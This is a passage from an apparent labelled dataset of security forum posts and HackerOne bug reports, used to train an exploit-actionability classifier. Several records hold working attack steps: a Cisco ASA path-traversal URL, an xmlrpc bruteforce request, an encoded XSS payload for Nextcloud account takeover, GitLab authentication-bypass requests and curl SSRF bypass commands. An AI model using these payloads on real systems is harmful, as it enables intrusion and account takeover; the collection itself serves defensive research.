"2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "edb750155b19ffa863c8", "text": "[Uncontrolled Resource Consumption] Possible DOS in app with crashing `exceptions_app`\n\nMake a new Rails app, add the `lograge` gem.\n\n```ruby\n# config/application.rb\nconfig.exceptions_app = self.routes\nconfig.lograge.enabled = true\n```\n\n```ruby\n# config/routes.rb\n\nRails.application.routes.draw do\n root to: \"site#index\"\n\n get 'errors/not_found'\n match \"/404\", to: \"errors#not_found\", via: :all\nend\n```\n\n```ruby\n# app/controllers/errors_controller.rb\n\nclass ErrorsController < ApplicationController\n def not_found\n render status: 404 # the view can do whatever, it doesn't matter\n end\nend\n```\n\nStart the server as a production app (eg. it would start on Heroku): `RAILS_ENV=production RACK_ENV=production SECRET_KEY_BASE=foo RAILS_SERVE_STATIC_FILES=enabled RAILS_MAX_THREADS=2 RAILS_LOG_TO_STDOUT=enabled rails s`\n\nRun this script:\n\n```ruby\n1000.times.each do |n|\n `curl -H \"Accept: application/xml\" -H \"Content-Type: application/xml\" -X GET http://localhost:3000///wp1/wp-includes/wlwmanifest.xml`\nend\n```\n\nAt some point (after 989 requests for me), Puma will crash:\n\n```\n2021-08-11 13:23:04 -0500 Rack app (\"GET ///wp1/wp-includes/wlwmanifest.xml\" - (127.0.0.1)): #\n```\n\nSince it's a fatal Ruby error (which is unrecoverable) this leaves Puma in a zombie state, similar to https://github.com/puma/puma/issues/2552\n\nThe reason this crashes is:\n\n- [ActionDispatch::ShowExceptions](https://github.com/rails/rails/blob/main/actionpack/lib/action_dispatch/middleware/show_exceptions.rb#L55) returns a non-frozen const.\n- [lograge](https://github.com/roidrage/lograge/blob/master/lib/lograge/rails_ext/rack/logger.rb#L15) doesn't wrap this response in a `Rack::BodyProxy`. If you weren't using lograge, then Rails would do so [here](https://github.com/rails/rails/blob/main/railties/lib/rails/rack/logger.rb#L37). Before realising this could be a Rails security vulnerability, I made a PR for this here: https://github.com/roidrage/lograge/pull/333\n- [RequestStore](https://github.com/steveklabnik/request_store/blob/master/lib/request_store/middleware.rb#L21) mutates the response body. This causes the const in Rails to get mutated, it now is a `Rack::BodyProxy` with a reference to itself. Every time it gets returned, it gets mutated again and the object gets one layer bigger. Before realising this could be a Rails security vulnerability, I made a PR for the mutation here: https://github.com/steveklabnik/request_store/pull/78\n- Eventually, we have an extremely large `Rack::BodyProxy` that references itself hundreds of times in memory. This is easy to make crash. In our case, [Rack::Sendfile](https://github.com/rack/rack/blob/master/lib/rack/sendfile.rb#L113) causes a `SystemStackError`, I think this happens because of how `BodyProxy` handles `respond_to_missing?`.\n\nI don't think this issue is unique to `lograge` + `RequestStore`. It can happen anywhere you have:\n\n- A middleware that mutates a response, and\n- `FAILSAFE_RESPONSE` (or another non-frozen const) being passed to that middleware, and\n- Something higher in the middleware stack that calls a missing method on the response.\n\nI was about to make a PR to Rails with this patch when it dawned on me that this could be a security issue:\n\n```diff\ndiff --git a/actionpack/lib/action_dispatch/middleware/show_exceptions.rb b/actionpack/lib/action_dispatch/middleware/show_exceptions.rb\nindex 0a7e895e59..d207765acc 100644\n--- a/actionpack/lib/action_dispatch/middleware/show_exceptions.rb\n+++ b/actionpack/lib/action_dispatch/middleware/show_exceptions.rb\n@@ -14,13 +14,14 @@ module ActionDispatch\n # If the application returns a \"X-Cascade\" pass response, this middleware\n # will send an empty response as result with the correct status code.\n # If any exception happens inside the exceptions app, this middleware\n- # catches the exceptions and returns a FAILSAFE_RESPONSE.\n+ # catches the exceptions and returns a failsafe response.\n class ShowExceptions\n FAILSAFE_RESPONSE = [500, { \"Content-Type\" => \"text/plain\" },\n [\"500 Internal Server Error\\", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "74fb185453b340f86dcd", "text": "[Cross-site Scripting (XSS) - Stored] Stored XSS on wordpress.com\n\n## Summary:\n\nHi team\n\nI found Stored XSS in wordpress.com via app.crowdsignal.com\n\n\n## Platform(s) Affected:\n wordpress.com\n\n## Steps To Reproduce:\n1 . Go to https://app.crowdsignal.com/dashboard and create a poll\n2 . Put the payload as answer \n3. Go to Share Your Poll and Copy the Website Popup\n4.Go to https://wordpress.com/posts add new post\n5. App Website Popup \n6. Save it\n7.Open the page and the XSS will fired\n\n█████████\n\n## Impact\n\nThe attacker can use this issue to execute malicious script code in the victim user browser also redirect the victim user to malicious sites", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c393979366f19838d75a", "text": "Don't have fom submit in lab appoiment\n\nHello, i’m try to capture de flag in appoiment lab, but saw the code page html and the page don’t have form submit event. So, the page login no make nothing. Somebody make can capture the flag ? Regards,", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-05-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "87fd4dec27fb3e915e86", "text": "[Information Disclosure] Wordpress users disclosure from json and xml file\n\n## Summary:\nIt's possible to get information about the users registered (such as: username) without authentication in Wordpress via API on:\nhttps://www.mtn.co.sz/wp-json/oembed/1.0/embed?url=https://www.mtn.co.sz/&format=json\nhttps://www.mtn.co.sz/author-sitemap.xml\n\n## Steps To Reproduce:\nThe path https://www.mtn.co.sz/wp-json/wp/v2/users/me is configured correctly. Active usernames cannot be displayed and the application responds with code 401, saying that I am not authorized.\n\n{F1523939}\n\nBut there is this active path, which allows anyone to view active usernames:\nhttps://www.mtn.co.sz/wp-json/oembed/1.0/embed?url=https://www.mtn.co.sz/&format=json\nhttps://www.mtn.co.sz/author-sitemap.xml\n\n{F1523940}\n\n{F1523941}\n\nUsername found:\n- waseem\n- nkosivile\n\nThese users can be used to bruteforce, thanks also to the enabled xmlrpc.php file. Perform this request with Burp:\n```\nPOST /xmlrpc.php HTTP/1.1\nHost: www.mtn.co.sz\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nUpgrade-Insecure-Requests: 1\nTe: trailers\nContent-Length: 180\n\n wp.getUsersBlogs \\{\\{admin\\}\\} \\{\\{password\\}\\}\n```\nYou can replace the \"admin\" parameter with the username.\n\n{F1523945}\n\n## Impact\n\nIt's possible to get all the users registered on the system and create a bruteforce directed to these users.\n\n**Suggested Mitigation/Remediation Actions**\nAs already done for the \"/wp-json/wp/v2/users/\" path, I recommend blocking the active path as well.\nIf the XMLRPC.php file is not used, it should be disabled and removed completely to avoid potential risks by bruteforce. Otherwise, it should at least be blocked from outside access.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ced4695ce3cd956062d5", "text": "[Path Traversal] [CVE-2020-3452] on ███████\n\nThe following subdomain is vulnerable to CVE-2020-3452, which is an unauthenticated file read in Cisco ASA & Cisco Firepower.\n\n# URL:\nhttps://████/\n\n# Vulnerable URL:\nhttps://███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n██████████\n\n# Resources:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nThe vulnerability could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n* Go to https://██████/+CSCOE+/logon.html\n* Intercept the request with Burpsuite\n* Send the request to Repeater\n* Change the URL path to the following `/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../as` an example to read \"/+CSCOE+/portal_inc.lua\" file.\n* You will get the portal_inc.lua file\n\n## Suggested Mitigation/Remediation Actions", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-3452"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a2e877d450008642b513", "text": "[Improper Authentication - Generic] Exposure of a valid Gitlab-Workhorse JWT leading to various bad things\n\n### Summary\n\nUsing the **State** Uploading API we could potentially do a bad thing:\n- Bypass `Gitlab::Workhorse.verify_api_request!`\n\nThis was due to the fact that Workhorse clean the URL before passing it to Rails, this is elaborated in #923027. \nand **State** Api read `request.body` to append it as a file!\n\n**lib/api/terraform/state.rb**\n```ruby\n desc 'Add a new terraform state or update an existing one'\n route_setting :authentication, basic_auth_personal_access_token: true, job_token_allowed: :basic_auth\n post do\n authorize! :admin_terraform_state, user_project\n\n data = request.body.read\n```\nThere is one very interestingly specific exploit which I've found in my researching on Geo is to un-authorizing push to any readable repository\nSince Gitlab has a pre-receive hook which check the permission even if attacker is able to bypass the Access Control in Rails part but here is pretty interesting stuff in EE:\n\n**ee/app/controllers/ee/repositories/git_http_controller.rb**\n```ruby\ndef user\n super || geo_push_user&.user\n end\n\n def geo_push_user\n @geo_push_user ||= ::Geo::PushUser.new_from_headers(request.headers)\n end\n```\nWhich mean the `user` for passing to Gitaly will be `user` from `geo_push_user`\n\n```ruby\n def self.new_from_headers(headers)\n return unless needed_headers_provided?(headers)\n\n new(headers['Geo-GL-Id'])\n end\n\n def user\n @user ||= identify_using_ssh_key(gl_id)\n end\n```\n\nTracing from this we will reach here\n\n```ruby\n def identify_using_ssh_key(identifier)\n key_id = identifier.gsub(\"key-\", \"\")\n\n identify_with_cache(:ssh_key, key_id) do\n User.find_by_ssh_key_id(key_id)\n end\n end\n\n```\nThis means: I am able to authenticate as any **SSH-KEY** by just passing the ID of the Key to headers `Geo-GL-Id`\n\n### Steps to reproduce\n\nSpliting into 2 parts, **GEO** is not neccessary for the PoC but **EE** Plan should be.\n\n**Exposing Gitlab JWT**\n\n- Set up an Project\n- Get a Personal Access Token of the user\n- Send the following request \n\n```http\nPOST /api/v4/projects//terraform/state/%2e%2e%2f%2e%2e%2fwikis%2fattachments?serial=1 HTTP/1.1\nHost: gitlab3.example.vm\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0\nPrivate-Token: \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryTdc8IV2vpQMwv6jW\nCookie: experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqZzBOVE14T1RWbUxXRTBZalF0TkRBek1pMWhaVGRpTFRNM05tSTBNalExWlRjNVl5ST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--64479e11c45d9e17bdf950f749ab3fa8b3ee278a; _gitlab_session=b50156c1d05716e1bebbfd448f38b890; known_sign_in=SkJhSDV0MWRqaFAyaFpZQlNCM3Vqbmg5UkxsZ0hyTHVWSlNPanNZT2YxbVQ4M2xvaUxLNkZabE9zeHdZOHlFQnloTWJxWGdPMWtKbUlkV25TNGFHRFFQVDlpdTRtUFpnTnZyd2xCTk5sS2hNRVBmODEvc2RiYVovT2RjTWgzWFQtLTY4ZEl1bXA4ZnVETVFrYnUrZVhaR1E9PQ%3D%3D--34ce6946f382229b6135333906ad3fd10ecbb284; sidebar_collapsed=false; event_filter=all\nUpgrade-Insecure-Requests: 1\nContent-Length: 316\n\n------WebKitFormBoundaryTdc8IV2vpQMwv6jW\nContent-Disposition: form-data; name=\"import_url\"\n\nhttp://gitlab3.example.vm/test/ttt\n------WebKitFormBoundaryTdc8IV2vpQMwv6jW\nContent-Disposition: form-data; name=\"mirror\"; filename=test.txt\nContent-Type: image/jpg\n\ntrue\n------WebKitFormBoundaryTdc8IV2vpQMwv6jW--\n```\n\n3. Later on send the following request \n\n```http\nGET /api/v4/projects/6/terraform/state/%2e%2e%2f%2e HTTP/1.1\nHost: gitlab3.example.vm\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0\nPrivate-Token: \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection:", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b6342bb7d3f75d11d966", "text": "Who has experience with Bloodhound?\n\nG’Day, Hackersploit Community! I’m a cybersecurity researcher conducting a study on the use of Bloodhound in penetration testing, red teaming, and offensive cyber operations. Your expertise could provide invaluable insights into these practices. Who I’m Looking For: Individuals with hands-on experience using Bloodhound. Those willing to share their insights. What’s In It For You: An opportunity to contribute to a study that aims to enhance deployment of cybersecurity deception tools. acknowledgment in research publications (username or real name as preferred) How to Participate: Please reach out via andrew.reeves@adelaide.edu.au if you’re interested or have any questions. Participation involves up to 1 hour of preparation time (familiarising yourself with a provided bloodhound map) and a short (30 minute) interview with the researcher. You can opt to complete a short survey instead of the interview if preferred. Your expertise is greatly appreciated and will help shape the deployment of new cyber deception tools. Thank you! Andrew", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2023-12-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0a41e2f86f5ae89f3240", "text": "Mate, your post is not in alignment with forum guidelines, why don’t you go ahead and write in detail how your tool works, what is wrong with the target software which allows your tool to work and how exactly you “exploit” it. Also make sure you go through the forum guidelines.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-01-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "711f376a4cb7b8258951", "text": "How to get back Maltego tool into Kali machine\n\nI am missing Maltego into my Kali machine, I did update & upgrade and I lost Maltego. Is there any way that I can get back Maltego into my Kali machine? it was the default tool but now it’s missing. anyone who can help, please. thanks.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-02-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8bb23c3804935501b2b6", "text": "[Phishing] Twitter account hijack @Costalfy\n\n##Summary:\nBroken Link Hijacking (BLH) is a web-based attack where it exploits external links that are no longer valid. The attackers take over this expired, stale, and invalid external links on credible websites or web applications for malicious or fraudulent purposes.\nLink Hijacking attacks occur because the website/ web application continues to contain links to expired/ stale resources/pages (loaded using external URLs).\n\nSo i found a twitter account of one of the members of **liberapay** which is **Andy Costanza** is broken, anyone can claim that account and can scam with it .\n\n{F2642478}\n##Steps To Reproduce:\n\n1- Go to ``` https://liberapay.com/Andy_Costanza/ ``` and Click on the twitter button .\n\n{F2642439}\n2-now it redirect you to Attacker ( My ) Profile .\n\n{F2642468}\n\n> - Those interested to get more infomation about **Andy Costanza** at https://liberapay.com/Andy_Costanza/ should be cautious of potential phishing or scam attempts. It is advised to take prompt action to ensure safety and security.\n\n## Impact\n\nSince the links can be hijacked so any attacker can claim the link and make fake Twitter profile of **Andy Costanza** and can do scam with them.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b09e70a38abcc37c2a01", "text": "[Deserialization of Untrusted Data] RCE vulnerability in Hyperledger Fabric SDK for Java\n\n[Hyperledger Fabric SDK for Java version 2.0.0](https://github.com/hyperledger/fabric-sdk-java/tree/v2.0.0) and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.\n\nIn the following source code files and corresponding line number, an arbitrary file gets parsed by SnakeYAML which allows to construct a Java object of any type, leading to remote code execution.\n- fabric-sdk-java/src/main/java/org/hyperledger/fabric/sdk/ChaincodeCollectionConfiguration.java line 121\n- fabric-sdk-java/src/main/java/org/hyperledger/fabric/sdk/NetworkConfig.java line 301\n- fabric-sdk-java/src/main/java/org/hyperledger/fabric/sdk/ChaincodeEndorsementPolicy.java line 241 and 262\n- fabric-sdk-java/src/main/java/org/hyperledger/fabric/sdk/LifecycleChaincodeEndorsementPolicy.java line 228\n\nObjects should be limited such as limiting to standard Java objects like List or Long by using SafeConstructor.\n```\nYaml yaml = new Yaml(new SafeConstructor());\n```\n\nMore info on Snake YAML can be found on the following url: https://bitbucket.org/asomov/snakeyaml/wiki/Documentation#markdown-header-loading-yaml\n\n## Impact\n\nRemote Code Execution vulnerability", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9b980f0f6078b1ab722a", "text": "It takes a combination of multiple skills and utility tools to stay anonymous online. One of which is using proxy servers to avoid being tracked. If you want to give it a try, I’d recommend storm proxies, especially because of its rotating proxies feature. Here are some storm proxies coupon to help you make a decision.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-04-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bbf6a31a3888ff391841", "text": "[Server-Side Request Forgery (SSRF)] Host header injection that bypassed protection and allowed accessing multiple subdomains\n\n> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to verify and then potentially issue a bounty, so be sure to take your time filling out the report!\n\n**Name of Vulnerability:*Host header injection/SSRF\n**Areas affected:** [App/ Website + URL/Location] https://www.urbancompany.com and it allowed accessing otherwise inaccessible subdomains https://av.urbancompany.com , https://ims.urbancompany.com , https://mesh.urbancompany.com\n**User Details:** [Registered Email and Registered Mobile Number used for the purpose of signing up an account with Urbanclap] N/A\n**Summary:** [add summary of the vulnerability] Ability to access certain subdomains (which should be presumably only for internal/trusted sources ) through host header manipulation.\nto be able to access.\n**Description:** [add more details about this vulnerability]\n\n## Steps To Reproduce:\n\n(Add details for how we can reproduce the issue through manual testing only)\n\n 1. Go to any of the three subdomains using any browser and after a while you'll see this:\n\n{F2046658}\n\n\n 2. Using burp and Match and Replace rule:\n\n{F2046655}\n\n 3. Now using burp chromium go to https://www.urbancompany.com , \nand you'll see the following for the Host: mesh.urbancompany.com:\n\n{F2046657}\n\n\nand for Host: av.urbancompany.com:\n\n{F2046651}\n\nand for Host: ims.urbancompany.com:\n\n{F2046654}\n\n\nSome interesting endpoints:\nFor av.urbancompany.com:\n\n{F2046652}\n\n\n{F2046653}\n\n\n\nFor mesh.urbancompany.com, potentially means ability to access user files, but because I don't know any of the files I was unable to confirm if it would ask for some authorization upon request to the existing file:\n\n{F2046659}\n\nThis endpoint looks interesting, but for some reason it doesn't actually initiate any uploading when I tried to upload files with mentioned extension:\n\n{F2046656}\n\n\nAdditional note:\nAll three subdomains resolve to the same ip address, which implies that if you have other subdomains associated with this ip address those subdomains are probably affected by this bypass as well.\n\nThank you for looking into this, and please let me know if you have any questions and/or if you need me to do some more testing, like fuzzing all the found endpoints to determine if there are some interesting bugs there.\n\nSincerely,\n@musashi42\n\n## Supporting Material/References:\nAttached are the screenshots.\n * List any additional material (e.g. screenshots, logs, etc.)\n\n## Impact\n\nImpact is dependent on whether ability to access the subdomains in question is considered as a bypass and if any of the disclosed information (especially various accessible js files) shouldn't be accessible in this way, in addition if there are more sensitive endpoints that I simply didn't find with my limited wordlists but larger wordlists would find. In addition, there's also a question if more interesting subdomains are associated with the same ip address as the three that I mentioned in the report and if those subdomains are even more interesting for the attacker because this bypass should work on any subdomain that's been associated with the ip address of the three mentioned subdomains.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "020799c7033d96cdc58a", "text": "[Information Disclosure] Critical sensitive information Disclosure. [HtUS]\n\n(Database user,Database password,Database name) \non https://██████.edu/\n\nI got sensitive information:\nview-source:https://██████████.edu/database.php.orig\n\n\nDatabase information (Database user,Database password,Database name)\n$hostname = '████████.edu';\n$db = '█████████';\n$username = '████_user';\n$password = '████';\n\n## Impact\n\nBug impact:\nSensitive information disclosed and possible for an attacker can access into the system.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6d3fe3d2ef939aaaa10d", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS vulnerability with full CSP bypass in Nextcloud installations using recommended bundle\n\n## Summary:\n\nThe vulnerability report describes a reflected XSS vulnerability with full CSP bypass in Nextcloud installations using the recommended bundle. The vulnerability can be exploited to perform a trivial account takeover attack.\n\n## Steps To Reproduce:\n\n## Setup Nextcloud\nDownload the latest Nextcloud release from Docker and run it on port 80:\n\n```\ndocker run -d -p 80:80 nextcloud:latest\n```\n\nOpen `http://localhost` in your browser and enter your chosen admin username and password. On the next screen install all recommended apps. The standard \"Nextcloud Office\" here will result in installing the vulnerable `richdocumentscode` application (see [HubBundle.php](https://github.com/nextcloud/server/blob/eddc6f2103665d985a9e541b16d61fab5ba6a1ee/lib/private/App/AppStore/Bundles/HubBundle.php#L45)):\n\n{F2211280}\n\n## Exploitation\n\nOpen the following URL in your (or the victims) browser (the payload needs some extra encoding):\n\n> http://localhost/custom_apps/richdocumentscode/proxy.php?req=/browser/a4b9c74/cool.html?WOPISrc=http://example.com:%3c%69%6d%67%20%73%72%63%3d%27%27%20%6f%6e%65%72%72%6f%72%3d%27%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%31%35%2c%39%39%2c%31%31%34%2c%31%30%35%2c%31%31%32%2c%31%31%36%29%29%3b%73%2e%73%72%63%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%34%37%2c%20%34%37%2c%20%34%39%2c%20%35%33%2c%20%34%36%2c%20%31%31%34%2c%20%31%31%35%29%3b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%27%3e\n\nThere is a full CSP bypass as the `proxy.php` from the default shipped \"richdocumentscode\" is not using a regular Nextcloud controller but plain PHP code:\n\n{F2211288}\n\n\n## Root cause\n\n1. Collabora Online is generating HTML documents using insecure string concatenation. ([code pointer](https://github.com/CollaboraOnline/online/blob/00b0fd48c949af475f8be0cc5bfd2149805f7905/wsd/FileServer.cpp#L719-L722))\n2. The included `proxy.php` inside the \"richdocumentscode\" is not applying any of the default CSP policies of Nextcloud, as it is running on the same origin this can be used for a trivial account take over attack. ([code pointer](https://github.com/CollaboraOnline/richdocumentscode/blob/3043ad186a9896899ff8d6f3ea83c93c5d487b48/proxy.php))\n\n## Impact\n\nThe vulnerability allows attackers to inject malicious code into web pages, which can be executed in the context of the victim's browser session. This means that an attacker can steal sensitive data, such as login credentials or personal information, or perform unauthorized actions on behalf of the victim, such as modifying or deleting data.\n\nIn this specific case, the vulnerability allows for a trivial account takeover attack. An attacker can exploit the vulnerability to inject code into the victim's browser session, allowing the attacker to take over the victim's account without their knowledge or consent. This can lead to unauthorized access to sensitive information and data, as well as the ability to perform actions on behalf of the victim.\n\nFurthermore, the fact that the vulnerability bypasses the Content Security Policy (CSP) makes it more dangerous, as CSP is an important security mechanism used to prevent cross-site scripting attacks. By bypassing CSP, attackers can circumvent the security measures put in place by the web application and execute their malicious code.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d22c4ce6df0ec1f83e7f", "text": "I was beating my head against the wall with this challenge and trying desperately not to over think it. This single line right here helped me so much because I wasn’t seeing what I expected through gdb. Thank you! 5- remember when you are inside gdb and run \" $(python -c blablabla)\" it’s the same as executing the script with the parameter, as follows: ‘./script $(python -c blablabla)’ I will also note, this chapter shows you one way of using msfvenom with its build up to the challenge. There are many tools in msfvenom’s tool suite!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-01-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "169094cd0ee1e802d655", "text": "[Server-Side Request Forgery (SSRF)] CVE-2022-27780: percent-encoded path separator in URL host\n\n## Summary:\nURL decoding the entire proxy string could lead to SSRF filter bypasses. For example,\n\nWhen the following curl specifies the proxy string `http://example.com%2F127.0.0.1`\n\n- If curl URL parser or another RFC3986 compliant parser parses the initial string http://127.0.0.1%2F.example.com, it will derive 127.0.0.1%2Fexample.com or 127.0.0.1/example.com as the host, if for instance, an SSRF check is used to determine if a host ends with .example.com (.example.com being a allow-listed domain), the check will succeed.\n- curl will then URL decode the entire proxy string to http://127.0.0.1/example.com and send it to the server\n````\nGET http://127.0.0.1/example.com HTTP/1.1\nHost: 127.0.0.1/example.com\nUser-Agent: curl/7.83.0\nAccept: */*\nProxy-Connection: Keep-Alive\n````\n- This proxy string is valid, and proxy servers, even RFC3986-compliant ones will send the request to the host 127.0.0.1\n\n## Steps To Reproduce:\nI switched things up and used 127.0.0.1 as the allow-listed server and example.com as the target server to make it easier (no need to setup a HTTP server) to reproduce.\n\n1. I used https://github.com/abhinavsingh/proxy.py as my proxy server. \n2. Perform the following:\n````\ncurl -x http://127.0.0.1:8899 http://example.com%2F127.0.0.1\n````\n3. You will receive a malformed response \n````\n\n\n\n \n 400 - Bad Request\n \n \n

400 - Bad Request

\n \n\n````\nHowever, this response is actually being returned by example.com, the reason is that proxy.py will forward the Host header, currently 127.0.0.1/example.com curl sends it, making it a Blind SSRF\n\n4. If \n- an attacker can control the host header either via curl itself \n- the proxy does not forward the host header curl sends, \n- or if servers which ignore the Host header entirely such as Express is used,\nit is possible to read the full response\n````\ncurl -x http://127.0.0.1:8899 -H \"Host: example.com\" http://example.com%2F127.0.0.1/%2e%2e/\n````\n## Recommended Fix:\nThe recommended fix for this is to not URL decode the host component of the proxy string when passing to proxy server.\n\n## Impact\n\nSSRF filter bypass at if the curl URL parser or a RFC 3986 parser is used, it could lead to blind / full SSRF depending on the proxy used.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-27780"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0ad5d260f6c3a2f02423", "text": "[Unknown] [Javascript]: Add new queries for Javascript Github Actions\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1896b557509baef57641", "text": "[Information Disclosure] Django debug enabled showing information about system, database, configuration files\n\n## Summary:\nHi team,\nThis subdomain `pulpo.it.glovoint.com` is a Django application running with debug mode turned on (DEBUG = True ).\nOne of the main features of debug mode is the display of detailed error pages to help developers.\nIf your app raises an exception when DEBUG is True, Django will display a detailed traceback, including a lot of metadata about your environment, such as all the currently defined Django settings.py file.\n\n## Steps To Reproduce:\nit's not complicated and needs some user interaction, using Burpsuite I send the POST request to `https://pulpo.it.glovoint.com/admin` path and I got 500 response. \n\nThe information leaked includes the following:\nDjango Version.\npython Version\nIP addresses\nS3_URL\ndatabase (username, URL, type, port )\nemail addresses\n\n\n## Supporting Material/References:\n███\n\n## Remediation:\nNever deploy with DEBUG turned on.\nTo disable debug mode, set DEBUG=False in your Django settings.py file.\n\n## Impact\n\nAn attacker can obtain information such as:\nDjango & Python version.\nUsed database type, database user name, and current database name.\nDetails of the Django project configuration.\nInternal file paths.\nException-generated source code, local variables and their values.\nThis information might help an attacker gain more information and potentially to focus on the development of further attacks on the target system.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d38fcfde9f9067ff85b5", "text": "yep, “just run everything with sudo” means there’s no use for sudo and you might as well just log in as root. On the next set of questions, one question is about running tcpdump to capture traffic on an interface. The accepted answer does not include sudo - in real life, without some fiddling, this will actually need sudo", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-06-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bcd641c93eb9f7ed77d0", "text": "[Improper Access Control - Generic] Disabling context isolation, nodeIntegrationInSubFrames using an unauthorised frame.\n\nDetails can be found in the following github advisory: 